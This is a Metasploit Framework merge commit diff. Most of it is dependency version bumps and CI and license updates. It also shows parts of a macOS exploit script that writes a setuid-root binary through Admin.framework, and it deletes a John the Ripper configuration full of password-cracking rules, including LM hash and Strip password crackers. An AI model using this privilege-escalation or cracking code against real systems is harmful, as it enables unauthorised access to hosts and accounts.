Land #11384 docs for dir_listing

doc cleanup
automatic module_metadata_base.json update
2019-02-13 20:36:44 -05:00 · 2019-02-13 20:35:48 -05:00 · 2019-02-13 15:09:31 -08:00 · 2019-02-13 17:00:35 -06:00 · 2019-02-13 16:13:10 -06:00 · 2019-02-13 15:45:48 -06:00
202 changed files with 26804 additions and 10748 deletions
@@ -20,6 +20,7 @@ env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
  # Used for testing the remote data service
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'

 matrix:
  fast_finish: true
@@ -3,6 +3,8 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'

+gem 'sqlite3', '~>1.3.0'
+
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.2)
+    metasploit-framework (5.0.6)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -21,9 +21,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.3.58)
+      metasploit-payloads (= 1.3.62)
      metasploit_data_models
-      metasploit_payloads-mettle (= 0.5.1)
+      metasploit_payloads-mettle (= 0.5.7)
      mqtt
      msgpack
      nessus_rest
@@ -38,7 +38,7 @@ PATH
      patch_finder
      pcaprub
      pdf-reader
-      pg (= 0.20.0)
+      pg (~> 0.20)
      railties
      rb-readline
      recog
@@ -137,11 +137,11 @@ GEM
      eventmachine (>= 1.0.0.beta.4)
    erubis (2.7.0)
    eventmachine (1.2.7)
-    factory_bot (4.11.1)
-      activesupport (>= 3.0.0)
-    factory_bot_rails (4.11.1)
-      factory_bot (~> 4.11.1)
-      railties (>= 3.0.0)
+    factory_bot (5.0.0)
+      activesupport (>= 4.2.0)
+    factory_bot_rails (5.0.0)
+      factory_bot (~> 5.0.0)
+      railties (>= 4.2.0)
    faker (1.9.1)
      i18n (>= 0.7)
    faraday (0.15.4)
@@ -163,12 +163,12 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (3.0.2)
+    metasploit-credential (3.0.3)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 3.0.0)
      net-ssh
-      pg (~> 0.15)
+      pg
      railties
      rex-socket
      rubyntlm
@@ -177,18 +177,18 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.58)
-    metasploit_data_models (3.0.4)
+    metasploit-payloads (1.3.62)
+    metasploit_data_models (3.0.5)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
      metasploit-concern
      metasploit-model
-      pg (= 0.20.0)
+      pg
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.1)
+    metasploit_payloads-mettle (0.5.7)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
    minitest (5.11.3)
@@ -215,7 +215,7 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (0.20.0)
+    pg (0.21.0)
    pg_array_parser (0.0.9)
    postgres_ext (3.0.1)
      activerecord (~> 4.0)
@@ -307,7 +307,7 @@ GEM
    rspec-mocks (3.8.0)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.8.0)
-    rspec-rails (3.8.1)
+    rspec-rails (3.8.2)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
@@ -361,7 +361,7 @@ GEM
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.16)
+    yard (0.9.18)

 PLATFORMS
  ruby
@@ -377,6 +377,7 @@ DEPENDENCIES
  rspec-rails
  rspec-rerun
  simplecov
+  sqlite3 (~> 1.3.0)
  swagger-blocks
  timecop
  yard
@@ -115,6 +115,10 @@ Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_d
 Copyright: Copyright 2018 SmartBear Software
 License: Apache 2.0

+Files: data/jtr/*
+Copyright: Copyright 1996-2013 by Solar Designer
+License: GNU GPL 2.0
+
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -29,8 +29,8 @@ em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 4.11.1, MIT
-factory_bot_rails, 4.11.1, MIT
+factory_bot, 5.0.0, MIT
+factory_bot_rails, 5.0.0, MIT
 faker, 1.9.1, MIT
 faraday, 0.15.4, MIT
 filesize, 0.2.0, MIT
@@ -43,12 +43,12 @@ json, 2.1.0, ruby
 loofah, 2.2.3, MIT
 metasm, 1.0.3, LGPL
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.2, "New BSD"
-metasploit-framework, 5.0.2, "New BSD"
+metasploit-credential, 3.0.3, "New BSD"
+metasploit-framework, 5.0.6, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.58, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 3.0.4, "New BSD"
-metasploit_payloads-mettle, 0.5.1, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.61, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 3.0.5, "New BSD"
+metasploit_payloads-mettle, 0.5.7, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.11.3, MIT
@@ -106,7 +106,7 @@ rspec, 3.8.0, MIT
 rspec-core, 3.8.0, MIT
 rspec-expectations, 3.8.2, MIT
 rspec-mocks, 3.8.0, MIT
-rspec-rails, 3.8.1, MIT
+rspec-rails, 3.8.2, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.8.0, MIT
 ruby-macho, 2.1.0, MIT
@@ -133,4 +133,4 @@ warden, 1.2.7, MIT
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.16, MIT
+yard, 0.9.18, MIT
@@ -14,7 +14,7 @@ development: &pgsql
  adapter: postgresql
  database: metasploit_framework_development
  username: postgres
-  pool: 5
+  pool: 25
  timeout: 5

 # Warning: The database defined as "test" will be erased and
@@ -27,7 +27,7 @@ def use_old_api():
 args = sys.argv

 if len(args) != 3:
-    print "usage: exploit.py source_binary dest_binary_as_root"
+    print("usage: exploit.py source_binary dest_binary_as_root")
    sys.exit(-1)

 source_binary = args[1]
@@ -42,7 +42,7 @@ attr = NSMutableDictionary.alloc().init()
 attr.setValue_forKey_(04777, NSFilePosixPermissions)
 data = NSData.alloc().initWithContentsOfFile_(source_binary)

-print "will write file", dest_binary
+print("will write file", dest_binary)

 if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
@@ -68,6 +68,6 @@ else:
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)


-print "Done!"
+print("Done!")

 del pool
@@ -1,2022 +0,0 @@
-#
-# This file is part of John the Ripper password cracker,
-# Copyright (c) 1996-2006,2008-2011 by Solar Designer
-#
-# ...with changes in the jumbo patch, by various authors
-#
-
-#
-# This file uses rules from the KoreLogic set published
-# online at: http://contest.korelogic.com/rules.html
-#
-
-[Options]
-# Wordlist file name, to be used in batch mode
-Wordlist = $JOHN/password.lst
-# Default Markov mode settings
-Statsfile = $JOHN/stats
-MkvLvl = 200
-MkvMaxLen = 12
-# Use idle cycles only
-Idle = Y
-# Crash recovery file saving delay in seconds
-Save = 600
-# Beep when a password is found (who needs this anyway?)
-Beep = N
-
-# Automagically disable OMP if MPI is used (set to N if
-# you want to run one MPI process per multi-core host)
-MPIOMPmutex = Y
-
-# Print a notice if disabling OMP (when MPIOMPmutex = Y)
-# or when running OMP and MPI at the same time
-MPIOMPverbose = Y
-
-# Time formatting string used in status ETA.
-# %c  means 'local' specific canonical form, such as:
-# 05/06/11 18:10:34
-#
-# Other examples
-# %d/%m/%y %H:%M   (day/mon/year hour:min)
-# %m/%d/%y %H:%M   (mon/day/year hour:min)
-# %Y-%m-%d %H:%M   (ISO 8601 style, 2011-05-06 18:10)
-TimeFormat = %c
-
-# Threshold for showing ETA, in percent. ETA will not be
-# shown if progress is less than this. If too low, early
-# reported figures will be less accurate (default 0.05%)
-ETAthreshold = 0.05%
-
-# "Single crack" mode rules
-[List.Rules:Single]
-# Simple rules come first...
-:
-s x**
-c (?a c Q
-c l Q
-s-c x** /?u l
-# These were not included in crackers I've seen, but are pretty efficient,
-# so I include them near the beginning
->6 '6
->7 '7 l
-c >6 '6 /?u l
->5 '5
-# Weird order, eh? Can't do anything about it, the order is based on the
-# number of successful cracks...
-<* d
-r c
-c <* (?a d c
-c >5 '5 /?u l
-c u Q
-c )?a r l
-[:c] <* !?A \p1[lc] p
-c <* c Q d
-c >7 '7 /?u
->4 '4 l
-c <+ (?l c r
-c <+ )?l l Tm
->3 '3
-c >4 '4 /?u
-c >3 '3 /?u l
-c u Q r
-<* d M 'l f Q
-c <* l Q d M 'l f Q
-# About 50% of single-mode-crackable passwords get cracked by now...
-# >2 x12 ... >8 x18
->[2-8] x1\1
->9 \[
-# >3 x22 ... >9 x28
->[3-9] x2\p[2-8]
-# >4 x32 ... >9 x37
->[4-9] x3\p[2-7]
-# >2 x12 /?u l ... >8 x18 /?u l
-c >[2-8] x1\1 /?u l
-c >9 \[ /?u l
-# >3 x22 /?u l ... >9 x28 /?u l
-c >[3-9] x2\p[2-8] /?u l
-# >4 x32 /?u l ... >9 x37 /?u l
-c >[4-9] x3\p[2-7] /?u l
-# Now to the suffix stuff...
-<* l $[1-9!0a-rt-z"-/:-@\[-`{-~]
-c <* (?a c $[1-9!0a-rt-z"-/:-@\[-`{-~]
-[:c] <* !?A (?\p1[za] \p1[lc] $s M 'l p Q X0z0 'l $s
-[:c] <* /?A (?\p1[za] \p1[lc] $s
-<* l r $[1-9!]
-c <* /?a u $[1-9!]
-[:c] <- (?\p1[za] \p1[lc] Az"'s"
-[:c] <- (?\p1[za] \p1[lc] Az"!!"
-[:c] (?\p1[za] \p1[lc] $! <- Az"!!"
-# Removing vowels...
-[:c] /?v @?v >2 (?\p1[za] \p1[lc]
-/?v @?v >2 <* d
-# crack -> cracked, crack -> cracking
-<* l [PI]
-c <* l [PI] (?a c
-# mary -> marie
-[:c] <* (?\p1[za] \p1[lc] )y omi $e
-# marie -> mary
-[:c] <* (?\p1[za] \p1[lc] )e \] )i val1 oay
-# The following are some 3l33t rules
-[:c] l /[aelos] s\0\p[4310$] (?\p1[za] \p1[:c]
-[:c] l /a /[elos] sa4 s\0\p[310$] (?\p1[za] \p1[:c]
-[:c] l /e /[los] se3 s\0\p[10$] (?\p1[za] \p1[:c]
-[:c] l /l /[os] sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /o /s so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /a /e /[los] sa4 se3 s\0\p[10$] (?\p1[za] \p1[:c]
-[:c] l /a /l /[os] sa4 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /a /o /s sa4 so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /e /l /[os] se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /[el] /o /s s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /a /[el] /o /s sa4 s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /e /l /o /s se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /a /e /l /o /s sa4 se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
-# Now to the prefix stuff...
-l ^[1a-z2-90]
-c l Q ^[A-Z]
-^[A-Z]
-l ^["-/:-@\[-`{-~]
-[:c] <9 (?a \p1[lc] A0"[tT]he"
-[:c] <9 (?a \p1[lc] A0"[aA]my"
-[:c] <9 (?a \p1[lc] A0"[mdMD]r"
-[:c] <9 (?a \p1[lc] A0"[mdMD]r."
-[:c] <9 (?a \p1[lc] A0"__"
-<- !?A l p ^[240-9]
-# Some word pair rules...
-# johnsmith -> JohnSmith, johnSmith
-p-c (?a 2 (?a c 1 [cl]
-# JohnSmith -> john smith, john_smith, john-smith
-p 1 <- $[ _\-] + l
-# JohnSmith -> John smith, John_smith, John-smith
-p-c 1 <- (?a c $[ _\-] 2 l
-# JohnSmith -> john Smith, john_Smith, john-Smith
-p-c 1 <- l $[ _\-] 2 (?a c
-# johnsmith -> John Smith, John_Smith, John-Smith
-p-c 1 <- (?a c $[ _\-] 2 (?a c
-# Applying different simple rules to each of the two words
-p-[c:] 1 \p1[ur] 2 l
-p-c 2 (?a c 1 [ur]
-p-[c:] 1 l 2 \p1[ur]
-p-c 1 (?a c 2 [ur]
-# jsmith -> smithj, etc...
-[:c] (?a \p1[lc] [{}]
-[:c] (?a \p1[lc] [{}] \0
-# Toggle case...
-c <+ )?u l Tm
-c T0 Q M c Q l Q u Q C Q X0z0 'l
-c T[1-9A-E] Q M l Tm Q C Q u Q l Q c Q X0z0 'l
-c l Q T[1-9A-E] Q M T\0 Q l Tm Q C Q u Q X0z0 'l
-c >2 <G %2?a [lu] T0 M T2 T4 T6 T8 TA TC TE Q M l Tm Q X0z0 'l
-c >2 /?l /?u t Q M c Q C Q l Tm Q X0z0 'l
-# Deleting chars...
->[2-8] D\p[1-7]
->[8-9A-E] D\1
-c /?u >[2-8] D\p[1-7] l
-c /?u >[8-9A-E] D\1 l
-=1?a \[ M c Q
-c (?a >[1-9A-E] D\1 c
-# Inserting a dot...
-[:c] >3 (?a \p1[lc] i[12].
-# More suffix stuff...
-<- l Az"[190][0-9]"
-c <- (?a c Az"[190][0-9]"
-<- l Az"[782][0-9]"
-c <- (?a c Az"[782][0-9]"
-<* l $[A-Z]
-c <* (?a c $[A-Z]
-# cracking -> CRACKiNG
-c u /I sIi
-# Crack96 -> cRACK96
-%2?a C Q
-# Crack96 -> cRACK(^
-/?A S Q
-# Crack96 -> CRaCK96
-c /?v V Q
-# Really weird charset conversions, like "england" -> "rmh;smf"
-:[RL] Q
-l Q [RL]
-c (?a c Q [RL]
-:[RL] \0 Q
-# Both prefixing and suffixing...
-<- l ^[1!@#$%^&*\-=_+.?|:'"] $\1
-<- l ^[({[<] $\p[)}\]>]
-# The rest of two-digit suffix stuff, less common numbers...
-<- l Az"[63-5][0-9]"
-c <- (?a c Az"[63-5][0-9]"
-# Some three-digit numbers...
-[:c] (?a \p1[lc] Az"007" <+
-[:c] (?a \p1[lc] Az"123" <+
-[:c] (?a \p1[lc] Az"[1-9]\0\0" <+
-# Some [birth] years...
-l Az"19[7-96-0]" <+ >-
-l Az"20[01]" <+ >-
-l Az"19[7-9][0-9]" <+
-l Az"20[01][0-9]" <+
-l Az"19[6-0][9-0]" <+
-# Uncomment the following lines if you're really crazy
-;# Insert/overstrike some characters...
-;!?A >[1-6] l i\0[a-z]
-;!?A l o0[a-z]
-;!?A >[1-7] l o\0[a-z]
-;# Toggle case everywhere (up to length 8), assuming that certain case
-;# combinations were already tried.
-;-c T1 Q M T0 Q
-;-c T2 Q M T[z0] T[z1] Q
-;-c T3 Q M T[z0] T[z1] T[z2] Q
-;-c T4 Q M T[z0] T[z1] T[z2] T[z3] Q
-;-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] Q
-;-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] Q
-;-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] Q
-;# Very slow stuff...
-;l Az"[1-90][0-9][0-9]" <+
-;-c (?a c Az"[1-90][0-9][0-9]" <+
-;<[\-9] l A\p[z0]"[a-z][a-z]"
-;<- l ^[a-z] $[a-z]
-
-# Wordlist mode rules
-[List.Rules:Wordlist]
-# Try words as they are
-:
-# Lowercase every pure alphanumeric word
-c >3 !?X l Q
-# Capitalize every pure alphanumeric word
-c (?a >2 !?X c Q
-# Lowercase and pluralize pure alphabetic words
-<* >2 !?A l p
-# Lowercase pure alphabetic words and append '1'
-<* >2 !?A l $1
-# Capitalize pure alphabetic words and append '1'
-c <* >2 !?A c $1
-# Duplicate reasonably short pure alphabetic words (fred -> fredfred)
-<7 >1 !?A l d
-# Lowercase and reverse pure alphabetic words
->3 !?A l M r Q
-# Prefix pure alphabetic words with '1'
->2 !?A l ^1
-# Uppercase pure alphanumeric words
-c >2 !?X u Q M c Q u
-# Lowercase pure alphabetic words and append a digit or simple punctuation
-<* >2 !?A l $[2!37954860.?]
-# Words containing punctuation, which is then squeezed out, lowercase
-/?p @?p >3 l
-# Words with vowels removed, lowercase
-/?v @?v >3 l
-# Words containing whitespace, which is then squeezed out, lowercase
-/?w @?w >3 l
-# Capitalize and duplicate short pure alphabetic words (fred -> FredFred)
-c <7 >1 !?A c d
-# Capitalize and reverse pure alphabetic words (fred -> derF)
-c <+ >2 !?A c r
-# Reverse and capitalize pure alphabetic words (fred -> Derf)
-c >2 !?A l M r Q c
-# Lowercase and reflect pure alphabetic words (fred -> fredderf)
-<7 >1 !?A l d M 'l f Q
-# Uppercase the last letter of pure alphabetic words (fred -> freD)
-c <+ >2 !?A l M r Q c r
-# Prefix pure alphabetic words with '2' or '4'
->2 !?A l ^[24]
-# Capitalize pure alphabetic words and append a digit or simple punctuation
-c <* >2 !?A c $[2!3957468.?0]
-# Prefix pure alphabetic words with digits
->2 !?A l ^[379568]
-# Capitalize and pluralize pure alphabetic words of reasonable length
-c <* >2 !?A c p
-# Lowercase/capitalize pure alphabetic words of reasonable length and convert:
-# crack -> cracked, crack -> cracking
-[:c] <* >2 !?A \p1[lc] M [PI] Q
-# Try the second half of split passwords
-s x**
-s-c x** M l Q
-
-
-# Prepend "pass"
-A0"[pP][aA][sS][sS]"
-
-
-# Case toggler for cracking MD4-based NTLM hashes (with the contributed patch)
-# given already cracked DES-based LM hashes.
-# Rename this section to [List.Rules:Wordlist] to activate it.
-[List.Rules:NT]
-:
-c T0Q
-c T1QT[z0]
-c T2QT[z0]T[z1]
-c T3QT[z0]T[z1]T[z2]
-c T4QT[z0]T[z1]T[z2]T[z3]
-c T5QT[z0]T[z1]T[z2]T[z3]T[z4]
-c T6QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]
-c T7QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]
-c T8QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]
-c T9QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]
-c TAQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]
-c TBQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]
-c TCQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]
-c TDQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]T[zC]
-
-# Incremental modes
-[Incremental:All]
-File = $JOHN/all.chr
-MinLen = 0
-MaxLen = 8
-CharCount = 95
-
-
-[Incremental:All4]
-File = $JOHN/all.chr
-MinLen = 0
-MaxLen = 4
-CharCount = 95
-
-[Incremental:Alpha]
-File = $JOHN/alpha.chr
-MinLen = 1
-MaxLen = 8
-CharCount = 26
-
-[Incremental:Digits]
-File = $JOHN/digits.chr
-MinLen = 1
-MaxLen = 8
-CharCount = 10
-
-[Incremental:Digits5]
-File = $JOHN/digits.chr
-MinLen = 1
-MaxLen = 5
-CharCount = 10
-
-[Incremental:Alnum]
-File = $JOHN/alnum.chr
-MinLen = 1
-MaxLen = 8
-CharCount = 36
-
-[Incremental:LanMan]
-File = $JOHN/lanman.chr
-MinLen = 0
-MaxLen = 7
-CharCount = 69
-
-# Some pre-defined word filters
-[List.External:Filter_Alpha]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if (c < 'a' || c > 'z') {
-		word = 0; return;
-	}
-}
-
-[List.External:Filter_Digits]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if (c < '0' || c > '9') {
-		word = 0; return;
-	}
-}
-
-[List.External:Filter_Alnum]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if ((c < 'a' || c > 'z') && (c < '0' || c > '9')) {
-		word = 0; return;
-	}
-}
-
-[List.External:Filter_No_Cap_or_Symbols]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if ((c < 'a' || c > 'z') && (c < '0' || c > '9')) {
-		return;
-	}
-	word = 0; return;
-}
-
-[List.External:Filter_LanMan]
-void filter()
-{
-	int i, c;
-
-	word[7] = 0;			// Truncate at 7 characters
-
-	i = 0;				// Convert to uppercase
-	while (c = word[i]) {
-		if (c >= 'a' && c <= 'z') word[i] &= 0xDF;
-		i++;
-	}
-}
-
-# A simple cracker for LM hashes
-[List.External:LanMan]
-int length;				// Current length
-
-void init()
-{
-	word[0] = 'A' - 1;		// Start with "A"
-	word[length = 1] = 0;
-}
-
-void generate()
-{
-	int i;
-
-	i = length - 1;			// Start from the last character
-	while (++word[i] > 'Z')		// Try to increase it
-	if (i)				// Overflow here, any more positions?
-		word[i--] = 'A';	// Yes, move to the left, and repeat
-	else				// No
-	if (length < 7) {
-		word[i = ++length] = 0;	// Switch to the next length
-		while (i--)
-			word[i] = 'A';
-		return;
-	} else {
-		word = 0; return;	// We're done
-	}
-}
-
-void restore()
-{
-	length = 0;			// Calculate the length
-	while (word[length]) length++;
-}
-
-# Simple and well-commented, yet useful external mode example
-[List.External:Double]
-/*
- * This cracking mode tries all the possible duplicated lowercase alphabetic
- * "words" of up to 8 characters long.  Since word halves are the same, it
- * only has to try about 500,000 words.
- */
-
-/* Global variables: current length and word */
-int length, current[9];
-
-/* Called at startup to initialize the global variables */
-void init()
-{
-	int i;
-
-	i = length = 2;			// Start with 4 character long words
-	while (i--) current[i] = 'a';	// Set our half-word to "aa"
-}
-
-/* Generates a new word */
-void generate()
-{
-	int i;
-
-/* Export last generated word, duplicating it at the same time; here "word"
- * is a pre-defined external variable. */
-	word[(i = length) << 1] = 0;
-	while (i--) word[length + i] = word[i] = current[i];
-
-/* Generate a new word */
-	i = length - 1;			// Start from the last character
-	while (++current[i] > 'z')	// Try to increase it
-	if (i)				// Overflow here, any more positions?
-		current[i--] = 'a';	// Yes, move to the left, and repeat
-	else {				// No
-		current = 0;		// Request a length switch
-		break;			// Break out of the loop
-	}
-
-/* Switch to the next length, unless we were generating 8 character long
- * words already. */
-	if (!current && length < 4) {
-		i = ++length;
-		while (i--) current[i] = 'a';
-	}
-}
-
-/* Called when restoring an interrupted session */
-void restore()
-{
-	int i;
-
-/* Import the word back */
-	i = 0;
-	while (current[i] = word[i]) i++;
-
-/* ...and calculate the half-word length */
-	length = i >> 1;
-}
-
-# Trivial parallel processing example
-[List.External:Parallel]
-/*
- * This word filter makes John process some of the words only, for running
- * multiple instances on different CPUs.  It can be used with any cracking
- * mode except for "single crack".  Note: this is not a good solution, but
- * is just an example of what can be done with word filters.
- */
-
-int node, total;			// This node's number, and node count
-int number;				// Current word number
-
-void init()
-{
-	node = 1; total = 2;		// Node 1 of 2, change as appropriate
-	number = node - 1;		// Speedup the filter a bit
-}
-
-void filter()
-{
-	if (number++ % total)		// Word for a different node?
-		word = 0;		// Yes, skip it
-}
-
-# Strip 0.5 ("Secure Tool for Recalling Important Passwords") cracker,
-# based on analysis done by Thomas Roessler and Ian Goldberg.  This will
-# crack passwords you may have generated with Strip; other uses of Strip
-# are unaffected.
-[List.External:Strip]
-int minlength, maxlength, mintype, maxtype;
-int crack_seed, length, type;
-int count, charset[128];
-
-void init()
-{
-	int c;
-
-/* Password lengths to try; Strip can generate passwords of 4 to 16
- * characters, but traditional crypt(3) hashes are limited to 8. */
-	minlength = 4;	// 4
-	maxlength = 8;	// 16
-
-/* Password types to try (Numeric, Alpha-Num, Alpha-Num w/ Meta). */
-	mintype = 0;	// 0
-	maxtype = 2;	// 2
-
-	crack_seed = 0x10000;
-	length = minlength - 1;
-	type = mintype;
-
-	count = 0;
-	c = '0'; while (c <= '9') charset[count++] = c++;
-}
-
-void generate()
-{
-	int seed, random;
-	int i, c;
-
-	if (crack_seed > 0xffff) {
-		crack_seed = 0;
-
-		if (++length > maxlength) {
-			length = minlength;
-
-			if (++type > maxtype) {
-				word[0] = 0;
-				return;
-			}
-		}
-
-		count = 10;
-		if (type >= 1) {
-			c = 'a'; while (c <= 'f') charset[count++] = c++;
-			c = 'h'; while (c <= 'z') charset[count++] = c++;
-			c = 'A'; while (c <= 'Z') charset[count++] = c++;
-		}
-		if (type == 2) {
-			charset[count++] = '!';
-			c = '#'; while (c <= '&') charset[count++] = c++;
-			c = '('; while (c <= '/') charset[count++] = c++;
-			c = '<'; while (c <= '>') charset[count++] = c++;
-			charset[count++] = '?'; charset[count++] = '@';
-			charset[count++] = '['; charset[count++] = ']';
-			charset[count++] = '^'; charset[count++] = '_';
-			c = '{'; while (c <= '~') charset[count++] = c++;
-		}
-	}
-
-	seed = (crack_seed++ << 16 >> 16) * 22695477 + 1;
-
-	i = 0;
-	while (i < length) {
-		random = ((seed = seed * 22695477 + 1) >> 16) & 0x7fff;
-		word[i++] = charset[random % count];
-	}
-
-	word[i] = 0;
-}
-
-# Try sequences of adjacent keys on a keyboard as candidate passwords
-[List.External:Keyboard]
-int maxlength, length;	// Maximum password length to try, current length
-int fuzz;		// The desired "fuzz factor", either 0 or 1
-int id[15];		// Current character indices for each position
-int m[0x400], mc[0x80];	// The keys matrix, counts of adjacent keys
-int f[0x40], fc;	// Characters for the first position, their count
-
-void init()
-{
-	int minlength;
-	int i, j, c, p;
-	int k[0x40];
-
-	minlength = 1;	// Initial password length to try
-	maxlength = 15;	// Maximum password length to try, up to 15
-	fuzz = 1;	// "Fuzz factor", set to 0 for much quicker runs
-
-/*
- * This defines the keyboard layout, by default for a QWERTY keyboard.
- * Please note that the sizes of m[] and mc[] arrays assume 7-bit
- * characters and will need to be doubled for 8-bit characters such as
- * umlauts.
- */
-	i = 0; while (i < 0x40) k[i++] = 0;
-	k[0] = '`';
-	i = 0; while (++i <= 9) k[i] = '0' + i;
-	k[10] = '0'; k[11] = '-'; k[12] = '=';
-	k[0x11] = 'q'; k[0x12] = 'w'; k[0x13] = 'e'; k[0x14] = 'r';
-	k[0x15] = 't'; k[0x16] = 'y'; k[0x17] = 'u'; k[0x18] = 'i';
-	k[0x19] = 'o'; k[0x1a] = 'p'; k[0x1b] = '['; k[0x1c] = ']';
-	k[0x1d] = '\\';
-	k[0x21] = 'a'; k[0x22] = 's'; k[0x23] = 'd'; k[0x24] = 'f';
-	k[0x25] = 'g'; k[0x26] = 'h'; k[0x27] = 'j'; k[0x28] = 'k';
-	k[0x29] = 'l'; k[0x2a] = ';'; k[0x2b] = '\'';
-	k[0x31] = 'z'; k[0x32] = 'x'; k[0x33] = 'c'; k[0x34] = 'v';
-	k[0x35] = 'b'; k[0x36] = 'n'; k[0x37] = 'm'; k[0x38] = ',';
-	k[0x39] = '.'; k[0x3a] = '/';
-
-	i = 0; while (i < 0x80) mc[i++] = 0;
-	fc = 0;
-
-	/* rows */
-	c = 0;
-	i = 0;
-	while (i < 0x40) {
-		p = c;
-		c = k[i++];
-		if (!c) continue;
-		f[fc++] = c;
-		if (!p) continue;
-		m[(c << 3) + mc[c]++] = p;
-		m[(p << 3) + mc[p]++] = c;
-	}
-	f[fc] = 0;
-
-	/* columns */
-	i = 0;
-	while (i < 0x30) {
-		p = k[i++];
-		if (!p) continue;
-		j = 1 - fuzz;
-		while (j <= 1 + fuzz) {
-			c = k[i + 0x10 - j++];
-			if (!c) continue;
-			m[(c << 3) + mc[c]++] = p;
-			m[(p << 3) + mc[p]++] = c;
-		}
-	}
-
-	id[0] = 0;
-	length = minlength;
-}
-
-void generate()
-{
-	int i, p, maxcount;
-
-	word[i = 0] = p = f[id[0]];
-	while (++i < length)
-		word[i] = p = m[(p << 3) + id[i]];
-	word[i--] = 0;
-
-	if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
-	while (++id[i] >= maxcount) {
-		if (!i) {
-			if (length < maxlength) {
-				id[0] = 0;
-				id[length++] = 0;
-			}
-			return;
-		}
-		id[i--] = 0;
-		if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
-	}
-}
-
-void restore()
-{
-	int i;
-
-	/* Calculate the length */
-	length = 0;
-	while (word[length]) length++;
-
-	/* Infer the first character index */
-	i = -1;
-	while (++i < fc) {
-		if (f[i] == word[0]) {
-			id[0] = i;
-			break;
-		}
-	}
-
-	/* This sample can be enhanced to infer the rest of the indices here */
-}
-
-# Generic implementation of "dumb" exhaustive search, given a range of lengths
-# and an arbitrary charset.  This is pre-configured to try 8-bit characters
-# against LM hashes, which is only reasonable to do for very short password
-# half lengths.
-[List.External:DumbForce]
-int maxlength;		// Maximum password length to try
-int last;		// Last character position, zero-based
-int lastid;		// Character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x100], c0;	// Character set
-
-void init()
-{
-	int minlength;
-	int i, c;
-
